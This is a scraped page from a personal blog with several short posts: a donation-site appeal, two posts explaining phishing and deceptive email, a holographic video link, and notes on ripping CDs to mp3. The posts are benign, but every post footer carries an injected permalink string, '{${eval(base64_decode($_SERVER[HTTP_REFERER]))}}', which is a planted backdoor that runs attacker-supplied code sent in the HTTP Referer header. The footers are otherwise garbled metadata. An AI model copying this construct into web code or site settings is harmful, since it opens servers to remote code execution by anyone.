Not That You Asked

Go Beyond with 10Beyond

My friend David Russell, Chief Inspiration Officer at 10Beyond, is doing great things with his team at 10Beyond, a new, innovative way for all of us to support our cause – and at the same time spread the word and encourage others to do the same.  See below email I received from David, to me as a 10Beyond user… won’t you consider joining the Core 100 today for your cause?

BTW, here is my current tag I use in my email:

The note from David Russell:

Tom, can you spare a dollar a day?

May Yip Harburg forgive me for butchering a line from his famous Depression era theme song, “Brother, can
you spare a dime?” but in the spirit of hard economic times and corporate transparency, I’ll risk the backlash in hope that you’ll respond to my request for a favor. I’m asking, begging, pleading with you to spare $1 a day for one month in support of your favorite nonprofit. Ok, there is a catch. I want you to make your donation through 10BEYOND.com and be a part of our CORE100 group of users. We need your help to gain the critical mass we need to begin to make a real difference to nonprofits all over the USA. By making your gift through 10BEYOND.com, not only will we send ninety-two cents of every dollar to your nonprofit, but we’ll also give you a cool way to spread the word about your nonprofit with every email message you send, using customized ema il “tags” that indicate your support for that organization. Next, we’ll report to you the impact your donation has made throughout your online network of peers – we call it your Influence. For example, if you inspire 10 people to give as you have, and each of those 10 inspires 10 others, you will have directly influenced 100 people to give $3,000 or more to a nonprofit cause – all because you put a tag in your email. Making a difference is now as easy as sending an email. More than simply joining a cause, 10BEYOND.com lets you put your money where your message is – I call it PYMWYMI – a goofy way to remind folks that anyone can join a cause, but it takes PYMWYMI (pronounced pim-wim-ee) to make a real difference in the budgets of nonprofits who depend on actual money, not just fans, to carry out their work.

So please, spare a dollar a day for your favorite cause today. If you have questions about how 10BEYOND.com works, just click around on our website for the answers, or email me personally at drussell at 10beyond.com. By the way, you can help build my own Influence by clicking my tag below. I’ve customized it with a photo of my son and our loved and missed family dog, Chap. Thanks for your help. –

David W. Russell, Founder/CEO

459No Commentshttp://www.notthatyouasked.org/2009/07/17/go-beyond-with-10beyond/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/Go+Beyond+with+10Beyond2009-07-17+17%3A38%3A53admin . read more

Sneaky Email Sucks

Having just hastily pulled together my last post on “Phishing” – I’ve been keeping a keen eye on my inbox for more interesting examples of evil email. A new message caught my eye – a good example of bad email – possibly evil, but sneaky at best.

Here are some key elements worth calling out:

[1] Once again, listed in my inbox the message looks innocuous enough. I recognize Reunion as Reunion.com – I’m not a member but occasionally see these types of invites, similar to other social space sites like Facebook, Linkedin, Plaxo, etc…

[2] Mozilla has protected me again – like with Mozilla Firefox screening links I click to known bad websites, Mozilla Thunderbird blocks any images from rendering – particularly from senders that are not in my address book. They give me the option of allowing this if I choose – presumably for senders I know. This is a common feature in email tools.

[3] Ah, here we see a bit more than we did in the Inbox listing [1]. Now I see a bit of trickery – Reunion Request is plain enough but now I see the local/user part of the sending email address is reun-ion.request@ and the domain portion is mutebrmodern.net. Why would anyone have to jack up the user portion of their email that way? It’d be like me being to-mba.rtel@somedomain.com. And that domain, if this is from Reunion – who the heck is mutebrmodern.net? It’s not out of the ordinary to have other domains send on your behalf, particularly if as a business you contract it, but as a user/recipient, your radar should be up at this point.

[4] Now this is really sneaky – back in the early days of email, there was only plain text formatting. Eventually HTML formatting made it to email providing a richer aesthetic appearance for content, similar to web pages. It can be useful, but some email programs can struggle with display of HTML code. At first blush it appears that something has gone wrong with my email program, Thunderbird, trying to render the message. Gosh, I am having trouble reading this message so I guess I better click the link right? More on that in a moment…

[5] Quick mention to take note of my email address in he URL/link in the message – shows me that the message is “personalized” but also a flag that I’m being tracked – when I click, someone, somewhere will know it was me.

[6] You have virus protection on your computer, right? I do. Make sure your anti-virus software scans your email, inbound and outbound. I’ve used AVG by Grisoft for several years. It is a fantastic program, and is free for individual, non-business purposes.

So back to point [4] – I’m not necessarily buying this – the error message “Having trouble viewing this message?” looks odd – not like what I’ve seen before in my email program. Now, I’m an email guy and have regularly scrutinized email as part of my job for years, so I don’t expect others to know this, but you can look at the raw source of an email to get even more insight. In Thunderbird a handy shortcut, Ctrl-U, does this. Here are some notable and telling things about this message from analyzing the raw message:

[7] Looking at the transmission details of the email recorded in the message headers, I see that the mail was delivered to my email server from yet another unknown domain, lsrree217.closerdried.net. As I said, it is not uncommon for legitimate companies to outsource delivery of email, but there is usually clear accountability and transparency in the domain names of those legitimate email service providers. I’m getting the feeling here that someone is purposely trying to not be known here.

[8] Further down in the message I see the plain text portion of the source message and my suspicions are confirmed – my email program Thunderbird didn’t have a problem showing the message and prompt me with “Having trouble view this message?” – that’s what the email author typed in – that is the message! Further review of the message source shows that this is the case in the HTML portion of the message as well. Okay, now I’m certain the sneakiness here is intentional.

[9] Here is more sneakiness/evilness – something those in the anti-spam space refer to as “hashbusting”. Sophos has a good example of it on their blog in which they describe it as “Hash busters are the seemingly random words or sentences located at the bottom of a spam message, used to try and bypass a variety of anti-spam techniques“. In the Sophos example the spammer puts the words where they are visible to he end recipient. In my case, the rendered message didn’t show this because the sender hid the random words in some HTML tags that aren’t visible.

Okay, so I’m convinced this isn’t even quasi-legit at best at this point, but I’ll bite – let’s click the link.

[10] mylife… what is that? Isn’t this supposed to be Reunion? In this case I happen to know that Reunion recently re-branded as mylife. Looking at the web address I see it starts with http://affiliates.mylife.com which is the bonafide mylife (formerly Reunion) website. Apparently Reunion has an affiliate member who advertises on their behalf, who not only uses sneaky and evil tactics, but hasn’t adjusted for the new brand!

[11] What the heck does this say? One of the things we encourage emailers and web site operators to do is to be openly transparent and accountable. Notices and disclosure in teeny type with low contrast is simply untrustworthy on the face of it. Bad job here mylife.

[12] This web page comes with a third-party seal of trust from Truste. These can be easily faked as well, but clicking on it shows it is legitimate.

[13] Again, check the website URL and validate that it makes sense and meets your expectation. In this case the Truste logo goes to a truste.org site and appears to make sense referencing the [14] mylife.com page we clicked from.

So, that’s a lot of analysis from one email. If anything, it exemplifies how easy it is for mailers to be sneaky in their email and how hard it is for consumes to understand what’s legit and what isn’t. In this case, Reunion appears to operate an affiliate program. That’s not uncommon for businesses on the Internet – but it take s policing – I’m betting (and hoping) that they aren’t aware of this particular affiliates behavior. I’ll pass this information along to them – in the hope that they will terminate this bad actor from their affiliate membership.

If you’ve got a good product, you shouldn’t have to trick people to come to find out more about it.

4032 Commentshttp://www.notthatyouasked.org/2009/03/15/sneaky-email-sucks/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/Sneaky+Email+Sucks2009-03-15+19%3A08%3A31admin . read more

Phishing Protection

I took note of a local article this week that referenced phishing as “fishing”. I figure it was a spell checker that caught it, but still it made me wonder if average folks still don’t understand what “phishing” is.

The FTC and other US government agencies sponsor and operate the website OnGuardOnline.gov which “provides practical tips from the federal government and the technology industry to help you be on guard against Internet fraud, secure your computer, and protect your personal information.”

On phishing, they provide some great educational information and tips – explaining phishing as:

Phishing is a scam where Internet fraudsters send spam or pop-up messages to lure personal and financial information from unsuspecting victims.

For a more comprehensive break down, check Wikipedia.

Better yet, here is Phishing Explained in Three Minutes by CommonCraft:

UPDATE: I learned of one more great tutorial on phishing scams by PayPal through an email they sent today – totally worth checking out!.

Surely you’ve seen these message. I had a great example land in my inbox this week, so I thought I’d quickly demo it here.

First, you can see it in my “Deleted” folder after I did some routine purging of email in my Return Path account. A few things to point out, sorted by “Sender” you can see I have a bunch of legitimate Facebook notices, from the bonafide Facebook corporation.

But, I also have this additional notice from the Facebook Upgrade Center. Looks totally legit along side other messages from Facebook in my inbox. Note the From: address is info@facebook.com. This is called spoofing and it is an inherent problem with email on the Internet. It is the reason that add on protocols for “email authentication” exist, providing legitimate senders, like the bonafide Facebook, a way for ISPs to validate return email addresses that spammers like to forge. Email authentication is its’ own topic and there are tons of resources – but I’ll tackle that in a later post. For the most part just realize that legitimate senders are using it to help ISPs identify them as the good guys and not scammers.

So, the From: line is spoofed, and most studies on consumers and email show that email users make their assessment of spam versue mail they want by assessing the From: line first and the Subject: line second. In this case both are believable as legitimate.

It is always good to be suspicious, and one way to protect yourself is to scrutinize the website links in email. In this message, you can see the URL of the link they included starts out with “http://login.facebook...” – so at a glance, seems fine, but it continues with “...default.videomessageid-vrblqkto9.sessionnewid83.com”

The most important part of web site links, relative to the owner operators, is discerned by looking at the domain and link from right to left. Starting with .com or .net or .org or whatever Top Level Domain is in the link, you can see now in this example that Facebook probably does not operate sessionnewid83.com. This is probably the result of “domain tasting” – a method that identity theives use to register domain names cheap and use the domain for spam and identity theft during a trial “grace period”. So not only do they abuse the domain but they can get their money back afterwards! Registrars are being pushed to fix this problem – friend John Levine has posted details on that here.

Okay, now the thing is, it is best to not click these links at all. It is possible for the landing pages to have rogue code that could infect your computer at that point alone. But if you don’t notice these small details or aren’t paying attention, you do, and that’s why phishing works!

The good news is that, today, major browser providers, Firefox and Internet Explorer all have built in Phishing filters. In my case, with Firefox, I click the link and here is what I get:

Phew! Thanks Firefox! I’ve known about phishing filters in browsers for a while, but this was the first time I’ve seen a phishing filter trigger live for me on a click. You can read more about these browsers phishing filter capabilities here:

Internet Explorer Phishing Filter
Firefox Phishing and Malware Protection

So, always scrutinize your email, pay attention to links, and make sure your are upgraded and protected with the latest browser technology. It is just too easy to be a bad guy these days, but the good guys continue to fight back.

3821 Commenthttp://www.notthatyouasked.org/2009/03/04/phishing-protection/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/Phishing+Protection2009-03-05+06%3A58%3A07admin . read more

Wow, Beam Me Up!

My friend David Schwartz sent this over:

Check out this insane Holographic Video Conference technology. Watch the video on the homepage.

Just like Star Trek. KAAAAAAAAAHN!

Sorry for the blog reference to a blog reference, but hey – now you know right? The demonstration is long, and they don’t really do anything spectacular – but the holographic representation of the presenters with the live presenter is really just cool.

Check it out – very cool stuff.

275No Commentshttp://www.notthatyouasked.org/2008/06/05/wow-beam-me-up/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/Wow%2C+Beam+Me+Up%212008-06-05+10%3A57%3A43admin . read more

The Google / Blog Internet FAQ

I love having Google around. A friend of mine works there, and we’ve spoken generally before about setting up FAQ pages for business service sites – and both sort of agreed that plain HTML files with Google search in front of it would really be just fine.

I demonstrated that twice to myself just tonight. One had to do with getting the door back on our electric range (we cleaned it). One google of “maytag range door back on” and two clicks from the second result and I’m here – a note from someone else confirming what a PITA this is going to be. We finally got it, and I believe it to be still a one-in-a-million shot, but I felt good having the confirmation from someone else in the world, that we weren’t completely on the wrong track. We will never take that door off again, BTW.

The other was that I was trying to rip some “old” CD’s of ours to put onto AJ’s new mp3 player. We really enjoy his phonetic pronunciation of some of the classic bands we have – REO Speedwagon, REM, etc… – but that’s another story. I started ripping with iTunes – which is super cinchy – there is an auto-detect when iTunes is running. Pop your CD in and it asks if you want to rip. So, I clicked. After 5 discs worth I finally tried to move them over. Crap. what is a.m4p anyway? Ugh, proprietary iTunes only to iPod formula. Darn it. I have an iPod, so that works for me, but AJ has a Sansa by SanDisk – so that was a massive wasted of time.

So to Google I go. Searched “mp3 rip free” a bit – since I’m in a time crunch and don’t want to buy something on such short notice that I haven’t fully evaluated. Some of what comes up is a bit sketchy. Then it dawns on me – the anti-Apple solution (I have a PC, BTW) – Windows Media Player!

I pop that open – and there a large glorious button right across the top, “Rip”. I try it. Error. Crap. Back to Google and search the error. The Microsoft Support site comes up, but is less than helpful.

Windows Media Player Error Message Help

You've encountered error message C00D10D2 while
using Windows Media Player. Additional information
is not currently available for this error.

Great error message. Anyway, some sub-detail here does indicate that I likely lack of an mp3 encoder available to my Windows Media Player. More quick Googling turns up this gem from Matt Read’s The Weblog. I won’t go into the details, but suffice it to say, a quick grab of this installer, provided by Justin Leoni, and in less than 2 minutes, I am happily ripping away to mp3 format.

What did we do before the Internet? Spend money with the Maytag man and listen to Vinyl, 8-tracks, and cassettes I guess. I’ll take the Internet age, thank you very much. And thank you Google!

268No Commentshttp://www.notthatyouasked.org/2008/03/23/the-google-blog-internet-faq/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/The+Google+%2F+Blog+Internet+FAQ2008-03-24+05%3A50%3A19admin . read more